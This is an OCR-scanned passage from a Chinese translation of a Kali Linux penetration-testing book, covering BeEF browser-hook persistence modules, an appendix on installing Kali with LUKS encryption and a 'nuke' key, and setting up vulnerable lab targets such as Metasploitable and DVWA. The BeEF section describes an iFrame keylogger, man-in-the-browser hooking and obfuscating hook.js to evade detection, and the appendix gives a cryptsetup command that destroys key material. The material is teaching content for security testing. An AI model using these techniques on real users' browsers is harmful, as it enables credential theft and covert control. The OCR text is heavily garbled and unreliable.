? A @ 192 168 43.130 History || Forge Request | 
4‘) Offline Browsers 
a yy 192.168 43.132 


? gA 8 192 168.43.128 


Domain Path 


192 158 222 130 Idvwralv.lnerabhilities'uplaad/ 


182 158 222 130 idvwealvulner abilities/upload! 


192.168 222.130 idvwarvulnerabilities/upload! 


图 11.30 日 志 摘 了 录 


一 旦 攻击 已 经 完成 ， 有 一 些 机 制 来 确保 该 连接 馈 持 久保 留 ， 其 中 包括 : 


HARHA (Confirm close) : 当 他 们 试图 关闭 一 个 项 目 时 ， 一 个 模块 弹出 ， 呈 现 给 受害 者 : Confirm Navigation-are you sure you 
want to leave this page? (确认 导航 一 你 确定 你 想 离 开 这 个 页 面 吗 ? ) 。 如 果 用 户 选择 Leave this Page【〈 离 开 这 个 页 面 ) ， 它 将 失 
效 ， 会 继续 弹出 Confirm Navigation。 


下 弹出 模块 (Pop-under module) : 这 是 配置 在 config.yaml 中 的 目 动 运行 模块 。 如 果 受 害 者 天 财主 浏览 器 选项 卡 ， 此 模块 试图 打开 一 个 
小 下 弹出 窗口 ， 用 于 保持 带 钩 浏览 器 。 这 可 以 通过 弹出 窗口 阻止 程序 来 阻止 。 


Frame 键 盘 记 录 需 〈iFrame keylogger) : 重 写 所 有 的 网 页 链接 到 iFrame， 并 获 凋 100g 的 原始 高 度 和 锅 度 。 为 实现 最 大 化 效 末 ， 它 应 该 
被 附加 到 JavaScript 键 盘 记 录 器 中 。 理 想 情 况 下 ， 你 会 加 载 带 钩 域 的 登录 页 面 。 


:人 在 浏览 费 中 (Man-in-the-browser) : 此 模块 可 确保 受害 者 点 击 任何 链 接 后 ， 出 现 的 下 一 个 页 面 也 将 被 钩 。 避 免 这 种 行为 的 唯一 途径 是 
在 地 址 栏 中 输入 一 个 新 的 地 址 。 


最 后 ， 虽 然 BeEF 提 供 了 一 个 极 好 的 模块 系列 来 执行 侦察 ， 同 时 用 于 杀 链 的 利用 和 后 期 利用 阶段 ， 但 BeEF 已 知 的 默认 活动 
(/hook.js 和 服务 器 头 信 息 ) 被 用 于 检测 攻击 ， 这 降低 了 其 有 效 性 。 测 试 人 员 将 不 得 不 伪 委 目 己 的 攻击 ， 使 用 Base64 编 码 、 空 
格 编码 、 随 机 的 变量 和 删除 注释 ， 以 确保 其 在 未 来 有 完整 的 有 效 性 。 


11.5 ”小结 


在 本 章 中 ， 我 们 研究 了 针对 系统 的 攻击 ， 通 常 是 从 被 保护 网 络 中 孤立 出 来 的 。 这 些 客 户 端 攻击 ， 重 点 放 在 特定 应 用 程序 的 漏 
洞 上 。 我 们 回顾 了 恶意 脚本 ， 尤 其 是 VBScript 和 Powershell， 其 在 测试 和 破坏 Windows 网 络 中 特别 有 用 。 然 后 ， 我 们 也 研究 了 
跨 站 脚本 框架 ， 它 可 以 破解 XSS 漏 洞 ， 以 及 BeEF 工 具 ， 其 目标 是 攻击 网 络 浏览 器 的 漏洞 。XSSF 和 BeEF 与 侦察 、 利 用 和 后 期 利用 
工具 的 整合 集成 ， 在 Kali 上 提供 了 综合 的 攻击 平台 . 


本 章 是 本 书 的 最 后 一 草 。 我 们 希望 这 本 书 能 帮助 你 了 解 攻击 者 如 何 使 用 工具 ， 比 如 Kali 入 侵 网 络 ， 以 及 如 何 使 用 相同 的 工具 
了 解 你 的 网 络 的 安全 漏洞 ， 并 在 你 目 己 的 网 络 被 入 侵 之 前 修补 它们 。 


附录 “安装 Kali Linux 


Kali Linux 是 基于 Linux 操 作 系 统 的 ， 用 作 审 计 网 络 安全 ， 并 文 持 上 百 个 不 同 应 用 程序 的 平台 。 其 复杂 性 是 由 于 它 的 安 委 和 测 
斌 万 法 的 多 样 性 。 本 附录 将 介绍 安 半 Kali 时 需要 考虑 的 一 些 事项 ， 集 中 介绍 如 何 获 得 一 个 安全 的 虚拟 机 ， 并 让 其 尽 可 能 快速 运 
行 ， 还 将 研究 如 何 为 本 书 提 到 的 测试 内 容 建立 、 维 护 一 个 便宜 的 站 点 。 


下 载 Kali Linux 
Kali Linux 提 供 多 个 可 选 版 本 来 下 载 和 安装 。 在 本 书 出 版 时 ， 最 新 版 本 是 1.06， 然 而 1.07 版 本 即将 发 布 。 当 前 ， 官 方 
(www.kali.org/downloads/) 提供 的 可 用 版 本 有 32 位 和 64 位 镜像 。 


进攻 安全 (Offensive Security) 预 配置 版 的 微 处 理 器 ARM (Advanced RISC Machines) 、 处 理 器 (如 Galaxy Note 
10.1, Raspberry Pi 和 Samsung Chromebooks) 可 供 下 载 ， 同 时 也 支持 ARMEL 和 ARM HL 平台 。 另 外 ， 预 安装 的 虚拟 机 镜像 


也 可 下 载 ， 下 载 网 址 为 : http://www.offensive-security.com/kali-lInux-vmware-armimage-download/, 


当 你 下 载 完 镜 像 文件 后 ， 为 了 确保 校 验 码 文件 SHA1 是 由 Kali 公 司 生 成 的 〈 它 将 签署 正式 使 用 Kali 的 加 密 密 铀 ， 这 是 网 上 下 载 
的 真实 性 验证 ) ， 需 要 通过 检验 SHA1 校 验 码 来 验证 镜像 文件 的 完整 性 。 验 证 工具 已 经 集成 到 Linux 和 OSX 操 作 系 统 中 。 但 是 ， 
如 果 使 用 的 是 Windows 操 作 系统 ， 还 需 使 用 第 三 万 验 证 工具 进行 验证 ， 如 


Hashtab (http://www.implbits.com/HashTab/HashTabWindows.aspx) 。 


如 果 你 希望 建立 一 个 定制 版 Kali， 尤 其 是 具有 可 选 梨 面 或 工具 集 的 版 本 ， 那 么 可 以 使 用 活动 构建 脚本 ， 


从 http://docs.kali.org/live-build/generate-updated-kali-iso 下 载 。 


Kali Linux 的 基本 安 委 步骤 


一 旦 你 获得 了 合适 版 本 的 Kali Linux， 必 须 安 沪 才能 使 用 。 以 下 为 可 用 的 安 六 选项 : 


:在 i386、AMD64 或 ARM 人 硬件 系统 中 安装 Kali Linux。 当 硬件 启动 后 Kali Linux 成 为 唯一 的 主 操作 系统 。 
` 双 系统 启动 。 通 常 在 MS Windows 操 作 系 统 中 这 一 项 是 可 选 的 ， 在 启动 时 ， 用 户 可 以 选择 是 启动 Kali Linux 还 是 Windows 操 作 系 统 。 这 比 直 
接 在 人 硬件 系统 中 安装 Kali Linux 更 加 灵活 。 但 是 ， 这 使 得 在 两 个 系统 中 来 回 切换 变 得 更 加 复杂 。 

“从 DVD 驱 动 器 或 USB 设 备 安装 。 如 果 把 主 操作 系统 配置 成 从 USB 设 备 启动 这 种 方式 是 很 有 用 的 。 但 是 ， 从 USB 设 备 启动 时 需要 额外 的 设置 变更 
(在 测试 过 程 中 保持 基础 操作 系统 、 应 用 程序 及 数据 的 所 有 设置 变更 ) 。 
.使 用 VMware 和 VirtualLBox 虐 拟 机 安装 。 我 们 发 现 这 种 方式 在 渗透 测试 中 是 非 稼 灵活 的 选择 。 
Kali 支 持 两 种 类 型 的 网 络 安装 一 迷你 ISO (Mini ISO) 安装 和 网 络 PXE (network PXE) 安装 。 迷 你 ISO 安装 一 个 最 小 化 的 系统 ， 并 通过 快 
速 网 络 连接 ， 安 装 剩 余 的 所 需 应 用 程序 。 在 网 络 PXE 安 装 中 ， 局 动 过 程 文 持 终 端 〈 没 有 CD-ROM 和 USB 接 口 ) 获取 IP 地 址 信息 并 安 状 Kali。 

只 需要 定期 癌 AWS 文 付费 用 就 可 以 使 用 。 


JN fü ze KE 


云端 安装 KalLi-64 位 的 Kali 映 像 文件 ， 可 以 在 亚马逊 EC2 市 场 找 到 。KalLi 镜 像 是 免费 的 ， 用 户 


忆 由 于 亚马逊 的 规定 ， 这 个 版 本 的 Kali Linux 不 能 使 用 默认 的 zoot 三 号 。 一 旦 你 从 亚 马 过 获得 SSH 密 钥 ， 你 必须 作为 一 个 用 户 连 接 到 Kali 
实例 ， 切 换 到 root。 你 可 能 不 得 不 下 载 另 外 一 个 工具 来 支持 测试 。 最 后 ， 你 需 告知 亚马逊 用 这 个 工具 来 做 合法 的 安全 测试 ， 而 不 是 将 其 作为 


黑客 攻击 工具 。 


在 虚拟 机 中 安 闻 Kali Linux 
在 本 书 中 ，Kali 已 经 配置 为 一 个 虚拟 机 (virtual machine, VM) ， 虚 拟 机 在 渗透 测试 时 有 以 下 一 些 优势 : 


普通 测试 虚拟 机 可 以 被 自主 研发 和 维护 ， 以 确保 测试 者 熟悉 测试 工具 集 以 及 它们 对 特殊 目标 系统 的 影响 。 
虚拟 机 促使 宿主 和 客体 操作 系统 之 间 的 快速 切换 ， 人 允许 测试 者 在 Windows 和 Linux 平 台 之 间 切 换 ， 以 便 在 测试 中 发 现 最 佳 配置 工具 。 


:虚拟 机 可 以 迁移 一 它 可 以 迁移 到 不 同 的 系统 或 操作 平台 。 

-虚拟 机 可 以 保存 在 库 中 ， 以 进行 回归 测试 。 在 工具 被 用 来 验证 一 个 网 络 或 系统 的 安全 性 时 ， 测 试 人 员 经 常 被 问 到 他 们 的 方法 和 工具 ， 是 否 可 
ee 测试 者 可 以 使 用 存档 的 虚拟 机 进行 该 漏洞 的 重新 测试 ， 以 确定 它 是 人 否 被 检测 到 ， 或 者 网 络 有 被 攻击 
和 风险。 


尽管 预 安 闪 的 虚拟 机 可 下 载 使 用 ,但 是 大 多 数 测 试 者 使 用 有 效 的 1SO 镜 像 创建 自己 的 虚拟 机 (虚拟 机 中 安 六 Kali 的 过 程 ， 几 


乎 与 硬件 设备 或 多 媒体 是 一 样 的 ， 如 USB 中 的 安 涂 ) 。Kali 文 持 VMware 和 Oracle VirtualBox 虚 拟 机 。 


总 之 ， 安 疼 过 程 非 党 简单， 并 由 应 用 程序 向 导 引 导 。 例 如 ， 当 使 用 VMware 虚拟 机 安 半 时 ， 安 和 妆 过 程 如 下 : 


/UN 


1. 选 择 Create a New Virtual Machine (创建 新 的 虚拟 机 ) 按钮 ， 创 建 一 个 新 的 虚拟 机 。 
2. 选 择 使 用 ISO 镜像 创建 虚拟 机 。 

3. 选 择 客体 操作 系统 。 

4A SERRAR RIE. 


5. 设 置 “磁盘 空间 ”， 最 小 可 用 磁盘 空间 大 小 为 12GB， 建 议 预 留 至 少 20~25GB。 最 小 内 存 1GB 可 确保 虚拟 机 可 用 ， 但 是 ， 
如 果 你 要 测试 大 型 网 络 及 将 使 用 多 线程 工具 ， 建 议 把 内 存 增加 到 人 至少 3GB。 


6. 重 审 硬 件 配 置 。 


局 确保 虚拟 机 配置 为 只 对 宿主 操作 系统 可 见 ， 尤其 是 对 于 没有 升级 的 虚拟 机 。 如 果 你 配置 虚拟 机 作为 对 机， 并 配置 为 在 互联 网 可 见 ， 那 么 小 
心 你 的 测试 平台 被 外 网 黑客 所 攻击 。 


7. 司 动 虚拟 机 。 局 动 菜单 将 提供 几 种 选项 ， 选 择 "Graphical Install" , 
8. 根 据 提示 选择 通用 语言 、 时 区 、 主 机 名 ， 并 设置 根 口令 。 


9. 当 选择 磁盘 分 区 时 ， 如 果 你 不 使 用 双 引 导 选 项 ， 你 可 以 把 整个 分 区 设 为 虚拟 磁盘 。 这 时 建议 你 选择 “全 磁盘 加 密 ” 这 个 选 
项 作为 。 


10. 虚 拟 机 将 完成 分 区 ， 将 变化 写 入 磁盘 ， 然 后 安 疼 系 统 文 件 。 还 会 出 现 一 些 额 外 的 配置 提示 信息 ， 虚 拟 机 将 重 局 。 
11. 这 时 ， 系 统 已 经 激活 。 根 据 第 1 章 所 摘 述 的 配置 系统 进行 配置 来 叉 持 渗透 测试 。 


忆 丙 配置 的 Kali 通 常 依赖 默认 的 用 户 名 和 密码 ， 可 能 拥有 事先 生成 的 ssH 主 机 密 钥 ， 这 些 应 该 尽快 修改 ， 


全 磁盘 加 密 和 nuking 主 密 钥 


渗透 测试 者 所 拥有 的 信息 中 往往 市 有 敏感 信息 个 成 功 的 测试 可 以 揭露 客户 网 络 的 缺陷， 甚 全 ， 在 一 些 国家 利用 工具 
来 进行 渗透 测试 可 能 被 视 为 非法 的 。 因 此 ， 测 试 者 单 使 用 全 磁盘 加 密 来 确保 系统 安全 。 


安装 到 硬盘 驱动 或 者 虚拟 机 中 ， 在 分 区 过 程 中 ，Kali 通 过 使 用 逻辑 卷 管理 (Logical Volume Management, LVM) 和 
Linux 统 一 密 钥 设置 (Linux Unified Key Setup, LUKS) 为 分 区 设置 全 磁盘 加 密 ， 这 是 Linux 硬 件 驱 动 加 密 的 标准 应 用 。 如 图 
F.1 所 示 。 


Partition disks 


The installer can guide you through partitioning a disk (using different standard schemes) or, if you 
prefer, you can do it manually. With quided partitioning you will still have a chance later to review and 
customise the results. 


If you choose quided partitioning for an entire disk, you will next be asked which disk should be used. 
Partihorung method: 


Guided - use entire disk 


Guided - use entire disk and set up IVM 


Guided - use entire disk and set up encrypted LVM 
Manual 


| Go Back || Continue | 


访问 加 密 的 驱动 需要 口令 ， 而 建议 的 口令 长 度 至 少 为 20 个 字符 。Kali Linux 1.06 版 本 提供 了 一 个 可 攻击 或 破坏 密 钥 的 口令 。 


驱动 器 加 密 后 不 能 够 解密 ， 这 融 确 保 了 驱动 的 机 密 性 。 


Kali Linux 包 含 了 LUKS， 这 是 一 个 允许 用 尸 加 密 硬盘 驱动 中 分 区 的 独立 加 密 规范 平台 。LUKS 人 允许 多 个 用 尸 密 钥 解 密 主 密 


钥 ， 人 允许 多 个 用 尸 加 密 和 解密 数据 ， 同 时 也 人 允许 使 用 备份 密 钥 。 


当 一 个 LUKS 加 密 器 被 创建 ， 会 随机 产生 一 个 主 密 钥 。 这 个 主 密 钥 使 用 口令 来 加 密 。 这 种 方法 的 优点 是 口令 不 会 直接 和 数据 


相关 联 一 一 如 果 两 个 相同 的 卷 补 加 密 且 使 用 了 相同 的 口令 ， 则 者 的 主 密 钥 保持 唯一 且 不 能 交换 。 


这 意味 着 如 果 一 个 主 密 钥 丢 失 或 被 破解 ， 束 不 可 能 恢复 加 密 数 据 。 如 果 输 入 一 个 特殊 的 口令 来 故意 删除 主 密 钥 ， 那 么 这 种 特 
性 允许 我 们 nuke 加 密 卷 或 硬件 驱动 的 恢复 。Kali linux 发 行 版 1.06 中 增加 了 紧急 情况 下 的 自 毁 功能 ， 并 通过 密码 创建 功能 来 执 


使 用 nuke 功 能 : 
1. 选 择 Full Disk Encryption (全 磁盘 加 密 ) 选项 安装 Kali， 在 安装 Kali 之 前 ， 所 有 分 区 将 被 删除 ， 这 将 导致 安装 速度 较 慢 。 


2. 使 用 下 面 的 命令 为 加 密 的 驱动 验证 LUKS 头 信息 : 
root@kali:~# cryptsetup luksDump /dev/sda5 


Key Slot 0 是 可 用 的 ， 这 与 磁盘 加 密 的 口令 有 关 。 其 余 的 key slot 是 未 使 用 的 。 上 述 命令 的 执行 结果 如 图 F.2 所 示 : 


root@test:~# cryptsetup luksDump /dev/sdab5 
LUKS header information for /dev/sdab5 


Version: l 

Cipher name: aes 

Cipher mode: xts-plain64 

Hash spec: shal 

Payload offset: 409€ 

MK bits: Sl? 

MK digest: 67 Ed 7a 68 7f 80 3d f5 ab c2 6d ba a3 78 ba 41 97 80 Ba f5 
MK salt: 67 fb 3f 38 48 70 00 f4 b5 3e fe 43 bf Bd da 7b 


94 er 4b bf 4b 65 28 e5 Bc Ba 39 16 75 3a c6 7d 
MK iterations: 28125 


UUID: 5ecCbd0a-0732-48ba-ae54-B6f65falc695 
Key Slot ©: ENABLED 
Iterations: 113474 
Salt: f7 d4 35 al 9c G3 2f e5 36 65 7b Ob 81 89 82 56 
cl ld 5a 6d 82 76 1f Ba 17 40 47 ac 44 d5 ba 65 
Key material offset: z 
AF stripes: 43800 
Key Slot 1: DISABLEC 
Key Slot 2: DISABLEE 
Key Slot 3: DISABLEC 
Key Slot 4: DISABLEC 
Key Slot 5: DISABLEE 
Key Slot 6: DISABLEC 
Key Slot /: DISABLEL 


图 F.2 ”验证 LUKS 头 信息 
3. 使 用 如 下 命令 添加 Nuke 密 钥 : 
root@kali:~# cryptsetup luksAddNuke /dev/sda5 
系统 会 引导 你 用 现 有 的 口令 来 验证 身份 ， 然 后 让 你 输入 nuke 选 项 的 新 密码 。 注 意 : 系统 不 会 引导 用 户 重 复 输入 两 次 密码 ， 


为 了 防止 输入 错误 的 密 钥 。 上 述 命令 的 执行 结果 ， 如 图 F.3 所 示 : 


root@test:~# cryptsetup luksAddNuke /dev/sdab 
Enter any existing passphrase: 
Enter new passphrase for key slot: 
root@test:~# B 

EIE. WAZA 
4. 为 了 确认 nuke 密 钥 是 可 用 的 ， 需 取 回 key slots 列 表 ， 使 用 如 图 F.4 所 示 的 命令 。 
现在 Key slot 1 可 以 使 用 ， 它 包 合 了 nuke 密 钥 。 


5. 使 用 如 下 命令 备份 密 钥 : 


root@kali:~# cryptsetupluksHeaderBackup --header-backup-file 
«filename» /dev/sda5 


6. 一 旦 主 密 钥 文 件 被 备份 ， 需 要 进行 加 密 ， 并 把 它 转移 出 系统 进行 安全 存储 。 一 些 应 用 程序 可 用 于 加 密 (如 7 Zip. 
bcrypt、ccrypt 和 GnuPG) ， 或 者 你 可 以 使 用 内 部 命令 如 openssl|。 命 令 的 示例 如 下 所 示 : 


root@kali:~# opensslenc -aes-256-cbc -salt -in <filename> 
-out <encrypted filename.enc> 


root@test:-# cryptsetup luksDump /dev/sdab 
LUKS header information for /dev/sda5 


Version: 1 

Cipher name: aes 

Cipher mode: xts-plain54 

Hash spec: shal 

Payload offset: 4096 

MK bits: 512 

MK digest: 67 5d 7a 68 7f 80 3d f5 ab c2 6d ba a3 78 ba 41 97 80 Ba f5 
MK salt: 67 fb 3f 38 48 70 00 f4 bs 3e fe 43 bf Bd da 7b 


94 07 4b bf 4b 65 28 e5 8c Ba 39 16 75 3a c6 7d 
MK iterations: 28125 


UUID: becObd0a-0/32-48ba-ae54-86f65falc695 
Key Slot @: ENABLED 
Iterations: 113474 
Salt: f7 d4 35 al Sc 03 2f e5 36 65 7b Ob 01 89 82 56 
cl ld Sa 6d 82 76 1f Ba 17 40 47 ac 44 d5 ba 65 
Key material offset: 8 
AF stripes: 4000 
Key Slot 1: ENABLED 
Iterations: 114285 
Salt: 20 d6 f9 4a O01 d6 9a /e de 68 be Ge d6 by b8 14 
94 bl ee 70 c8 90 d4 dc b6 /6 cl Bd fc cd db 6d 
Key material offset: 512 
AF stripes: 4000 


Key Slot 2: DISABLED 


图 F.4 ” 取 回 key slots 71] 


当 备 份 文件 被 安全 保护 ， 你 的 系统 可 以 阻止 密码 暴力 破解 ， 如 果 nuke 密 码 被 输入 ， 则 本 地 拷贝 主键 将 被 破坏 ， 使 攻击 者 无 
法 访问 加 密 文件 。 


如 果 你 在 分 配 了 nuke 口 令 后 ， 转 存 了 LUKS 头 信息 ， 你 将 看 到 如 图 F.5 所 示 的 输出 结果 : 


root@test:~# cryptsetup luksDump /dev/sda5 
LUKS header information for /dev/sda5 


Version: 1 

Cipher name: aes 

Cipher mode: xts-plain64 

Hash spec: shia 

Payload offset: 4096 

MK bits: 517 

MK digest: 67 5d 7a 68 7f 80 3d f5 ab c2 6d ba a3 78 ba 41 97 80} 

8a f5 

MK salt: 67 fb 3f 38 48 70 00 f4 b5 3e fe 43 bf 8d da 7b 
94 07 4b bf 4b 65 28 e5 8c 8a 39 16 75 3a c6 7d 

MK iterations: 28125 

UUID: 5ecObd0a-0732-48ba-ae54-86f65falc695 


Key Slot 0: DISABLED 
Key Slot 1: DISABLED 
Key Slot 2: DISABLED 
Key Slot 3: DISABLED 
Key Slot 4: DISABLED 
Key Slot 5: DISABLED 
Key Slot 6: DISABLED 
Key Slot 7: DISABLED 


图 F.5 LUKS 头 信息 


如 果 你 想 恢 复 驱 动 ， 你 被 担 使 用 nuke? 只 要 你 能 从 远 哨 仓储 的 地 方 ， 取 回 加 密 的 数据 头 ， 事 情 瓯 简单 了 ; 你 将 有 可 能 解密 
硬盘 驱动 并 且 恢 复数 据 。 一 旦 加 密 的 数据 头 被 解密 (使 用 基于 文件 保护 的 合适 的 解密 命令 ) ， 输 入 以 下 命令 : 


root@kali:~# cryptsetupluksHeaderRestore --header-backup-file 
<filename> /dev/sdab5 


这 会 产生 如 下 警告 : 
Device /dev/sda5 already contains LUKS header, Replacing header will 


destroy existing keyslots. Are you sure? 


当 出 现 提示 时 ， 输 入 YES， 这 将 替换 数据 头 并 人 允许 你 解密 硬件 驱动 。 


建立 测试 环境 


在 测试 一 个 真实 环境 之 前 ,测试 者 必须 完全 理解 测试 工具 的 使 用 方法 ， 工 具 对 目标 系统 产生 的 影响 ， 以 及 如 何 去 解 释 目 标 系 
统 活 动 时 产生 的 数据 。 


频繁 地 测试 受 控 环境 产生 的 结果 与 在 真实 环境 中 使 用 相同 的 测试 是 不 同 的 ， 包 括 以 下 几 方 面 原因 : 


目标 环境 的 操作 系统 与 测试 环境 的 操作 系统 不 同 ， 如 不 同 版 本 的 操作 系统 。《〈XP 与 Windows 8.1 完 全 不 同 ， 而 Windqows 8.1 pro 和 企业 版 
也 有 一 些 不 同 ，32 位 和 64 位 操作 系统 之 间 仍 然 有 一 些 区 别 。)〉 操作 系统 修改 为 支持 本 地 语言 也 会 对 存 有 的 漏洞 有 重大 的 影响 。 


“目标 环境 有 不 同 的 服务 包 、 补 丁 和 应 用 升级 。 

目标 环境 安装 了 不 同 的 三 方 应 用 ， 这 些 会 与 网 络 流量 冲突 ， 包 括 新 的 漏洞 ， 以 及 对 测试 者 发 现存 在 的 漏洞 也 有 影响 。 
-目标 环境 配置 在 宿主 操作 系统 中 的 虚拟 机 与 安装 在 裸 机 中 的 响应 不 同 。 

-目标 被 各 种 不 同 的 网 络 、 系 统 设备 和 应 用 保护 。 


为 了 获得 最 好 的 结果 ， 测 试 者 (攻击 者 ) 通常 使 用 两 步 测试 过 程 。 首 先 测 试 者 使 用 设置 好 的 虚拟 机 执行 攻击 ， 以 确定 使 用 合 
适 的 工具 及 方法 。 一 旦 这 种 简单 测试 得 到 证 实 ， 测 试 者 使 用 更 复杂 的 虚拟 或 物理 网 络 映射 到 目标 网 络 进行 重复 攻击 。 


易 受 攻击 的 操作 系统 和 应 用 


测试 者 通 弟 维护 一 个 当前 操作 系统 及 历史 操作 系统 的 库 。 


测试 微软 操作 系统 时 ，Windows XP 被 作为 参考 标准 来 测试 脆弱 性 。 尽 管 ，Windows XP 在 2014 年 已 被 弃 用 ， 微 软 也 不 再 
提供 文 持 服务 ， 但 它 仍然 保留 在 许多 网 络 服务 和 工作 站 中 ， 还 散 入 到 打印 机 及 零售 终端 等 设备 中 。 


当 测 试 脆弱 的 Windows 操 作 系统 时 ， 为 了 在 测试 环境 中 获得 当前 微软 产品 的 访问 ， 订 阅 
MSDN (http://msdn.microsoft.com/en-ca/subscriptions/aa336858) 是 非常 重要 的 。 
忆 不 要 在 公众 共享 服务 站 点 下 载 操作 系统 ， 如 Tortent 站 点 ，DigitalDefence 近 来 评估 了 40 多 个 从 Tortrent 站 点 下 载 的 微软 操作 系统 ， 
个 下 载 版 本 都 被 植 入 了 后 门 供 攻击 者 远程 访问 。 
测试 具有 特定 漏洞 的 第 三 万 Windows 应 用 时 ， 测 试 者 可 以 访问 保留 这 些 旧 版 本 的 应 用 库 ， 这 些 旧 版 本 中 ， 许 多 都 包括 可 利 
用 的 漏洞 。 这 些 应 用 库 中 的 案例 可 以 在 以 下 链接 中 看 到 : 


‘http: //www.oldapps.com 


‘www.oldversion.com 


由 于 开源 的 特性 ， 许 多 类 似 UNIX 版 本 的 操作 系统 如 (Linux, BSD# Solaris) 也 可 以 用 于 下 载 和 测试 : 


下 面 的 项 目 将 让 你 测试 市 有 已 知 漏洞 的 UNIX 操 作 系统 ， 可 以 访问 : 
‘Damn Vulnerable Linux (http://sourceforge.net/projects/virtualhacking/files/os/dvl/) 


‘LAMPSecurity (http://sourceforge.net/projects/lampsecurity/) 


‘Metasploitable2 (http://sourceforge.net/projects/virtualhacking/files/os/metasploitable/) 
带 有 已 知 脆弱 性 的 旧版 UNIX 应 用 可 以 从 应 用 站 点 下 载 。 


复杂 的 测试 环境 (操作 系统 和 易 受 攻击 的 应 用 ) 可 以 从 VulnHub 库 (http://vulnhub.com.) 中 下 载 。 这 些 镜像 通常 有 一 些 
实例 ， 表 明 利 用 镜像 的 各 种 方法 。 包 括 以 下 内 容 : 

bWAPP: 提供 了 集中 破坏 Wep 站 点 的 方法 。 

‘VulnVPN: 人 允许 测试 者 利用 VEPN 来 访问 服务 左 和 内 网 服务 并 获得 z*oot 访 问 。 

‘VulnVoIP: 人 允许 测试 者 练习 侦察 以 及 开发 VoIP 网 络 。 


最 后 ， 测 试 者 将 利用 一 些 基 于 Web 应 用 的 可 用 漏洞 进行 测试 。 


一 个 最 常用 的 测试 目标 就 是 基于 Linux 镜 像 的 Metasploitable 系 统 。 这 种 基础 的 操作 系统 有 多 种 漏洞 ; 另外 ， 当 它 启动 时 会 
加 载 易 受 攻击 的 Web 应 用 。 为 了 访问 应 用 ， 先 打开 Metasploitable 虚 拟 机 ， 然 后 启动 一 个 独立 的 Kali Linux 虚 拟 机 。 在 Kali 虚 拟 
机 中 ， 打 开 浏 览 器 然后 输入 Metasploitable 虚 拟 机 的 IP 地 址 ， 你 将 看 到 如 图 F.6 所 示 的 菜单 选项 。 


Metasploitable2 — Linux — lceweasel 
File Edit View History Bookmarks Tools Help 


{ }Metasploitable2 - Linux 


Warning: Never expose this VM to an untrusted network! 
Contact: msfdev[at]metasploit.com 


Login with msfadmin/asfadmin to get started 


e TWiki 

e phpMvAdmin 
e Mutillidae 

e DVWA 

e WebDAV 


图 FE.6 ”IMetasploitable 的 菜单 


基于 Web 的 应 用 ， 也 支持 对 企业 的 测试 ， 针 对 Web 应 用 攻击 一 样 有 用 。 这 5 个 应 用 如 下 所 示 : 


TWiki: 这 是 一 个 支持 在 测试 过 程 中 企业 合作 的 wiki 应 用 ; 它 使 用 结构 化 内 容 来 创建 简单 的 工作 流 系统 。 


‘phpmyadmin: 允许 在 Web 上 远程 执行 MySQL 数 据 库 。 


‘webdav: 这 种 基于 Web 的 分 布 式 编辑 和 版 本 (Web-baseqd Distributed Authoring and Versioning) 控制 扩展 到 HTTP 协 议 ， 人 允许 用 
户 在 远程 服务 器 中 协作 编辑 和 管理 文件 。 


‘Mutillidae: 一 个 脆弱 的 网 络 黑客 组 成 的 PHP 脚 本 ， 容 易 受 到 OWASP 10 大 漏洞 的 威胁 。 


图 F.7 为 OWASP 十 大 漏洞 ， 十 大 漏洞 可 在 下 拉 菜 单 中 看 到 ， 例 如 选择 选项 “A2-Cross Site Scripting (XSS) ”提供 访问 特 
殊 漏洞 的 子 菜单 (如 Reflected (反射 型 ) 、Persistent (持久 型 ) 、DOM Injection (DOM 注 入 ) 等 ) 。 


Mutillidae| 


Security Level: 0 (Hosed) 


Version: 2.1.19 


Home Login/Register Toggle Hints Toggle 


Core Controls 


OWASP Top 10 A1 - Injection ETillidae: Delibera 


AS - Cross Site Scripting (XSs i b Reflected (First Order) 

Others "I ] ripting ! Refl | (First Ordear 

AS - Broken Authentication and Persistent (Second Order! 

Documentation Session Management 

| i DOM Injection 

Resources A4 - Insecure Direct Object Reference | A m 
Via "Input" ( GET/POST) 

AS - Cross Site Request Forgery UM 
via HTTP Headers 


AG - Security Misconfiguration p Via Misconfiguration 


A7 - Insecure Cryptographic Storage b Against HTML 5 Storage 


— p Against JSON 


Site AS - Insufficient Transport Layer p Via Cookie Injection 
hacked... err... qug —— 
tested with sam A10 - Unvalidated Redirects and 
WTF, Backtraclizsvr st: 


图 F.7 Mutillidae 主 界面 


wuti111Gae 配 置 文件 中 指定 的 数据 库 是 错误 的 ， 你 可 能 收 到 多 种 数据 库 访 问 的 错误 操作 信息 。 为 了 确定 这 些 信息 ， 登 录 
Metasploitable2 编 辑 /var/www/mutillidae/config.inc 文 件 ; 修改 从 metasploit 到 owasp10 的 dboname 字 段 。 


:最 后 ，Metasploitable 框 架 运行 Damn Vulnerable Web Application (DVWA) ，DVWA 提 供 不 同 的 攻击 特殊 漏洞 的 挑战 ， 如 图 F. 8 所 
Ze 


Welcome to Damn Vulnerable Web App! 


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals 
are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers 
better understand the processes of securing web applications and aid teachers/students to teach/learn web 
application security in a class room environment. 


WARNING! 


Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting providers public html folder or 
any internet facing web server as it will be compromised. We recommend downloading and installing XAMPP 
onto a local machine inside your LAN which is used solely for testing. 


Disclaimer 


We do not take responsibility for the way in which any one uses this application. We have made the purposes of 
tne application clear and it should not be used malicioushy. We have given warnings and taken measures to 
prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of 
DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it. 


General Instructions 


The help button allows you to view hits/tips for each vulnerability and for each security level on their respective 
page. 


图 F.8 DVWA ERD 


其 他 易 受 攻击 的 Web 应 用 程序 如 下 : 


‘Hackxor: 这 是 一 个 Web 应 用 黑客 游戏 程序 ， 参 与 者 通过 一 系列 的 案例 解决 不 同 漏洞 的 挑战 来 取得 进步 
(http://hackxor .sourceforge.net/cgi-bin/index.pl) . 


‘Foundstone: BAAR I — AFI EsaHEWeb A, MHRI PIR eR. aANT Cwww.mcafee.com/us/downloads/free- 


tools/index.aspx) 。 


‘LAMPSecurity: 提供 了 一 系列 虚拟 机 用 来 教授 Linux、Apache、PHP 以 及 数据 库 安全 
(http://sourceforge.net/projects/lampsecurity/files/) ào 


‘OWASP Broken Web Applications Project: 这 是 一 些 易 受 攻击 的 Web 站 点 Chttp://code.google.com/p/owaspbwa/) 。 


‘WebGoat: 这 是 一 个 不 安全 的 J2EE Web 程 序 ， 用 来 提供 一 个 真实 测试 环境 。 由 OWASP 来 维护 
(https://www.owasp.org/index.php/Category:OWASP WebGoat Project) 。 


